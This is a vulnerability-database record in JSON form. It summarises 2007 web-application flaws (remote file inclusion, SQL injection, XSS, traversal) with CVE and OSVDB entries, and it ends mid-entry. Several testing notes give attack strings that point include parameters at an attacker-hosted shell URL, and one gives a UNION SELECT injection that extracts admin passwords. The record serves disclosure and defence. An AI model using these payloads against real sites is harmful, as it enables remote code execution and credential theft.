ID SECURITYVULNS:VULN:7135
Type securityvulns
Reporter
Modified 2007-02-01T00:00:00
Description
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
{"id": "SECURITYVULNS:VULN:7135", "bulletinFamily": "software", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "published": "2007-02-01T00:00:00", "modified": "2007-02-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7135", "reporter": " ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:15933", "https://vulners.com/securityvulns/securityvulns:doc:15926", "https://vulners.com/securityvulns/securityvulns:doc:15935", "https://vulners.com/securityvulns/securityvulns:doc:15930", "https://vulners.com/securityvulns/securityvulns:doc:15934", "https://vulners.com/securityvulns/securityvulns:doc:15928", "https://vulners.com/securityvulns/securityvulns:doc:15924", "https://vulners.com/securityvulns/securityvulns:doc:15947", "https://vulners.com/securityvulns/securityvulns:doc:15946", "https://vulners.com/securityvulns/securityvulns:doc:15929", "https://vulners.com/securityvulns/securityvulns:doc:15927", "https://vulners.com/securityvulns/securityvulns:doc:15931", "https://vulners.com/securityvulns/securityvulns:doc:15932"], "cvelist": ["CVE-2007-0679", "CVE-2007-0649", "CVE-2007-0702", "CVE-2007-0678", "CVE-2007-0683", "CVE-2007-0677", "CVE-2007-0680", "CVE-2007-0676", "CVE-2007-0688", "CVE-2007-0681", "CVE-2007-0628", "CVE-2007-0662", "CVE-2007-0616", "CVE-2007-0687", "CVE-2007-0684"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:23", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2018-08-31T11:09:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0683", "CVE-2007-0684", "CVE-2007-0628", "CVE-2007-0662", "CVE-2007-0680", "CVE-2007-0678", "CVE-2007-0649", "CVE-2007-0679", 
"CVE-2007-0677", "CVE-2007-0681"]}, {"type": "osvdb", "idList": ["OSVDB:33604", "OSVDB:36041", "OSVDB:33605", "OSVDB:33078", "OSVDB:33072", "OSVDB:33631", "OSVDB:36039", "OSVDB:38130", "OSVDB:33079", "OSVDB:33010"]}, {"type": "exploitdb", "idList": ["EDB-ID:3243", "EDB-ID:3238", "EDB-ID:3239", "EDB-ID:3237", "EDB-ID:3242", "EDB-ID:3236", "EDB-ID:3235", "EDB-ID:3234", "EDB-ID:29557", "EDB-ID:3233"]}, {"type": "nessus", "idList": ["EXOPHPDESK_ID_SQL_INJECTION.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15930", "SECURITYVULNS:DOC:15946", "SECURITYVULNS:DOC:15947", "SECURITYVULNS:DOC:15935", "SECURITYVULNS:DOC:15927", "SECURITYVULNS:DOC:15934", "SECURITYVULNS:DOC:15932", "SECURITYVULNS:DOC:15926", "SECURITYVULNS:DOC:15931", "SECURITYVULNS:DOC:15924", "SECURITYVULNS:DOC:15933", "SECURITYVULNS:DOC:15929", "SECURITYVULNS:DOC:15928"]}], "modified": "2018-08-31T11:09:23", "rev": 2}, "vulnersScore": 4.9}, "affectedSoftware": [{"name": "Extcalendar", "operator": "eq", "version": "2"}, {"name": "Hailboards", "operator": "eq", "version": "1.2"}, {"name": "Java System Access Manager", "operator": "eq", "version": "7.0"}, {"name": "OpenEMR", "operator": "eq", "version": "2.8"}, {"name": "Phpbb Tweaked", "operator": "eq", "version": "3"}, {"name": "zenphoto", "operator": "eq", "version": "1.0"}, {"name": "Cerulean Portal System", "operator": "eq", "version": "0.7"}, {"name": "SIPS", "operator": "eq", "version": "0.3"}, {"name": "phpEventMan", "operator": "eq", "version": "1.0"}, {"name": "ExoPHPDesk", "operator": "eq", "version": "1.2"}, {"name": "Java System Access Manager", "operator": "eq", "version": "6.2"}, {"name": "ExtCalendar", "operator": "eq", "version": "2.0"}, {"name": "Cadre", "operator": "eq", "version": "20020724"}, {"name": "L2J Dropcalc", "operator": "eq", "version": "4"}, {"name": "Java System Access Manager", "operator": "eq", "version": "6.1"}, {"name": "Omegaboard", "operator": "eq", "version": "1.2"}, {"name": "PhpMyRing", "operator": 
"eq", "version": "4.1"}]}
{"cve": [{"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in lang/leslangues.php in Nicolas Grandjean PHPMyRing 4.1.3b and earlier allows remote attackers to execute arbitrary PHP code via a URL in the fichier parameter.", "edition": 6, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0679", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0679"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:nicolas_grandjean:phpmyring:4.1.1b", "cpe:/a:nicolas_grandjean:phpmyring:4.1.3b", "cpe:/a:nicolas_grandjean:phpmyring:4.1.2b", "cpe:/a:nicolas_grandjean:phpmyring:4.1.0b"], "id": "CVE-2007-0679", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0679", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.1b:*:*:*:*:*:*:*", "cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.0b:*:*:*:*:*:*:*", "cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.3b:*:*:*:*:*:*:*", "cpe:2.3:a:nicolas_grandjean:phpmyring:4.1.2b:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in fw/class.Quick_Config_Browser.php in Cadre PHP Framework 20020724 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[config][framework_path] parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0677", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": 
"NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0677"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:cronosys:cadre_php_framework:22020724"], "id": "CVE-2007-0677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0677", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cronosys:cadre_php_framework:22020724:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in portal.php in Cerulean Portal System 0.7b allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0684", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0684"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:cerulean_portal_system:cerulean_portal_system:0.7b"], "id": "CVE-2007-0684", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0684", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cerulean_portal_system:cerulean_portal_system:0.7b:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "profile.php in ExtCalendar 2 and earlier allows remote attackers to change the passwords of arbitrary users without providing the original password, and possibly perform other unauthorized actions, via modified values to register.php.", "edition": 6, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0681", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0681"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:extcalendar:extcalendar:2"], "id": "CVE-2007-0681", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0681", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:extcalendar:extcalendar:2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in includes/functions.php in Omegaboard 1.0beta4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0683", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0683"], "modified": "2018-11-29T15:45:00", "cpe": ["cpe:/a:omegaboard_project:omegaboard:1.0"], "id": "CVE-2007-0683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0683", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:omegaboard_project:omegaboard:1.0:beta4:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in includes/usercp_viewprofile.php in Hailboards 1.2.0 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-01T22:28:00", "title": "CVE-2007-0662", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0662"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:hailboards:hailboards:1.2.0"], "id": "CVE-2007-0662", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0662", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:a:hailboards:hailboards:1.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "SQL injection vulnerability in windows.asp in Fullaspsite Asp Hosting Sitesi allows remote attackers to execute arbitrary SQL commands via the kategori_id parameter.", "edition": 4, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0678", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0678"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:fullaspsite:asp_hosting_site:*"], "id": "CVE-2007-0678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0678", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fullaspsite:asp_hosting_site:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Access Manager 6.1, 6.2, 6 2005Q1 (6.3), and 7 2005Q4 (7.0) before 20070129 allow remote attackers to inject arbitrary web script or HTML via the (1) goto or (2) gx-charset parameter. 
NOTE: some of these details are obtained from third party information.", "edition": 4, "cvss3": {}, "published": "2007-01-31T18:28:00", "title": "CVE-2007-0628", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0628"], "modified": "2017-07-29T01:30:00", "cpe": ["cpe:/a:sun:java_system_access_manager:6.2", "cpe:/a:sun:java_system_access_manager:6.3", "cpe:/a:sun:java_system_access_manager:7.0", "cpe:/a:sun:java_system_access_manager:6.1"], "id": "CVE-2007-0628", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0628", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sun:java_system_access_manager:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:java_system_access_manager:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:java_system_access_manager:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:java_system_access_manager:6.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "Variable overwrite vulnerability in interface/globals.php in OpenEMR 2.8.2 and earlier allows remote attackers to overwrite arbitrary program variables and conduct other unauthorized activities, such as conduct (a) remote file inclusion attacks via the srcdir parameter in custom/import_xml.php or (b) cross-site scripting (XSS) attacks via the rootdir parameter in interface/login/login_frame.php, via vectors associated with extract operations on the (1) POST and (2) GET superglobal arrays. 
NOTE: this issue was originally disputed before the extract behavior was identified in post-disclosure analysis. Also, the original report identified \"Open Conference Systems,\" but this was an error.\nIncorrect bug report. This CVE should have a score of 0 because there are no products affected.", "edition": 6, "cvss3": {}, "published": "2007-02-01T01:28:00", "title": "CVE-2007-0649", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.2, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:H/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0649"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:openemr:openemr:2.8.2"], "id": "CVE-2007-0649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0649", "cvss": {"score": 4.3, "vector": "AV:N/AC:H/Au:M/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openemr:openemr:2.8.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:31:21", "description": "PHP remote file inclusion vulnerability in includes/functions.php in Phpbb Tweaked 3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.", "edition": 6, "cvss3": {}, "published": "2007-02-03T01:28:00", "title": "CVE-2007-0680", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0680"], "modified": "2017-10-19T01:30:00", "cpe": ["cpe:/a:phpbb_tweaked:phpbb_tweaked:3", "cpe:/a:phpbb_tweaked:phpbb_tweaked:1"], "id": "CVE-2007-0680", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0680", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpbb_tweaked:phpbb_tweaked:1:*:*:*:*:*:*:*", "cpe:2.3:a:phpbb_tweaked:phpbb_tweaked:3:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-0679"], "description": "## Manual Testing Notes\nhttp://[target]/[path]//lang/leslangues.php?fichier=[SHELL]\n## References:\nISS X-Force ID: 32033\nGeneric Exploit URL: http://milw0rm.com/exploits/3238\nFrSIRT Advisory: ADV-2007-0448\n[CVE-2007-0679](https://vulners.com/cve/CVE-2007-0679)\nBugtraq ID: 22345\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36039", "id": "OSVDB:36039", "title": "PHPMyRing lang/leslangues.php fichier Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0684"], "description": "## Manual Testing Notes\nhttp://[target]/[script_pat]/portal/portal.php?phpbb_root_path=http://[attacker]?\n## References:\nOther Advisory URL: http://www.xoron.info/bugs/ceruleanportalsystem-perl.txt\nOther Advisory URL: http://www.xoron.info/bugs/ceruleanportalsystem-html.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0008.html\nISS X-Force ID: 32058\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3243\nFrSIRT Advisory: 
ADV-2007-0444\n[CVE-2007-0684](https://vulners.com/cve/CVE-2007-0684)\nBugtraq ID: 22356\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:33605", "id": "OSVDB:33605", "title": "Cerulean Portal System portal.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0680"], "description": "## Manual Testing Notes\nhttp://[target]/[path]/includes/functions.php?phpbb_root_path=http://[attacker]?\n## References:\nVendor URL: http://sourceforge.net/projects/phpbbtweaked/\n[Secunia Advisory ID:24001](https://secuniaresearch.flexerasoftware.com/advisories/24001/)\nOther Advisory URL: http://www.xoron.info/bugs/phpbbtweaked.txt\nOther Advisory URL: http://milw0rm.com/exploits/3235\nISS X-Force ID: 32024\nFrSIRT Advisory: ADV-2007-0451\n[CVE-2007-0680](https://vulners.com/cve/CVE-2007-0680)\nBugtraq ID: 22344\n", "edition": 1, "modified": "2007-01-31T07:33:45", "published": "2007-01-31T07:33:45", "href": "https://vulners.com/osvdb/OSVDB:33079", "id": "OSVDB:33079", "title": "Phpbb Tweaked includes/functions.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0677"], "description": "## Manual Testing Notes\nhttp://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?\n## References:\nOther Advisory URL: http://echo.or.id/adv/adv63-y3dips-2007.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0691.html\nISS X-Force ID: 32005\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3237\nFrSIRT Advisory: 
ADV-2007-0449\n[CVE-2007-0677](https://vulners.com/cve/CVE-2007-0677)\nBugtraq ID: 22336\n", "edition": 1, "modified": "2007-01-31T01:49:56", "published": "2007-01-31T01:49:56", "href": "https://vulners.com/osvdb/OSVDB:33631", "id": "OSVDB:33631", "title": "Cadre PHP Framework fw/class.Quick_Config_Browser.php GLOBALS[config][framework_path] Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-0678"], "description": "## Manual Testing Notes\nhttp://[target]/windows.asp?kategori_id=-1%20union+all+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin\n## References:\nISS X-Force ID: 32020\nGeneric Exploit URL: http://milw0rm.com/exploits/3233\nFrSIRT Advisory: ADV-2007-0453\n[CVE-2007-0678](https://vulners.com/cve/CVE-2007-0678)\nBugtraq ID: 22347\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36041", "id": "OSVDB:36041", "title": "Fullaspsite Asp Hosting Sitesi windows.asp kategori_id Variable", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-0681"], "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 32035\nGeneric Exploit URL: http://milw0rm.com/exploits/3239\n[CVE-2007-0681](https://vulners.com/cve/CVE-2007-0681)\n", "edition": 1, "modified": "2007-01-31T16:56:04", "published": "2007-01-31T16:56:04", "href": "https://vulners.com/osvdb/OSVDB:38130", "id": "OSVDB:38130", "title": "ExtCalendar profile.php Arbitrary User Password Modification", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, 
{"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0628"], "description": "# No description provided by the source\n\n## References:\nVendor Specific Solution URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102621-1\nSecurity Tracker: 1017570\n[Secunia Advisory ID:23979](https://secuniaresearch.flexerasoftware.com/advisories/23979/)\nISS X-Force ID: 31936\nFrSIRT Advisory: ADV-2007-0411\n[CVE-2007-0628](https://vulners.com/cve/CVE-2007-0628)\nBugtraq ID: 22302\n", "edition": 1, "modified": "2007-01-27T06:48:54", "published": "2007-01-27T06:48:54", "href": "https://vulners.com/osvdb/OSVDB:33010", "id": "OSVDB:33010", "title": "Sun Java System Access Manager Multiple XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0683"], "description": "## Manual Testing Notes\nhttp://[target]/[script_pat]/includes/functions.php?phpbb_root_path=http://[attacker]?\n## References:\nOther Advisory URL: http://www.xoron.info/bugs/omegaboard-perl.txt\nOther Advisory URL: http://www.xoron.info/bugs/omegaboard-html.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0007.html\nISS X-Force ID: 32057\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3242\nFrSIRT Advisory: ADV-2007-0445\n[CVE-2007-0683](https://vulners.com/cve/CVE-2007-0683)\nBugtraq ID: 22355\n", "edition": 1, "modified": "2007-01-31T00:00:00", "published": "2007-01-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:33604", "id": "OSVDB:33604", "title": "Omegaboard includes/functions.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0662"], "description": "## Manual Testing 
Notes\nhttp://[target]/[path]/includes/usercp_viewprofile.php?phpbb_root_path=http://[attacker]?\n## References:\nVendor URL: http://hailboards.org/\n[Secunia Advisory ID:24002](https://secuniaresearch.flexerasoftware.com/advisories/24002/)\nOther Advisory URL: http://milw0rm.com/exploits/3236\nISS X-Force ID: 31997\nFrSIRT Advisory: ADV-2007-0450\n[CVE-2007-0662](https://vulners.com/cve/CVE-2007-0662)\nBugtraq ID: 22333\n", "edition": 1, "modified": "2007-01-31T06:18:27", "published": "2007-01-31T06:18:27", "href": "https://vulners.com/osvdb/OSVDB:33078", "id": "OSVDB:33078", "title": "Hailboards includes/usercp_viewprofile.php phpbb_root_path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-0616"], "description": "## Solution Description\nUpgrade to version 1.0.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor Specific News/Changelog Entry: http://www.zenphoto.org/support/topic.php?id=1148\nVendor Specific News/Changelog Entry: http://www.zenphoto.org/support/topic.php?id=1146&replies=3\n[Secunia Advisory ID:24026](https://secuniaresearch.flexerasoftware.com/advisories/24026/)\nISS X-Force ID: 32102\nFrSIRT Advisory: ADV-2007-0470\n[CVE-2007-0616](https://vulners.com/cve/CVE-2007-0616)\nBugtraq ID: 22368\n", "edition": 1, "modified": "2007-01-23T12:26:34", "published": "2007-01-23T12:26:34", "href": "https://vulners.com/osvdb/OSVDB:33072", "id": "OSVDB:33072", "title": "zenphoto index.php album Variable Traversal Arbitrary File Access", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:02:04", "description": "PHPMyRing <= 4.1.3b (fichier) Remote File Include Vulnerability. CVE-2007-0679. 
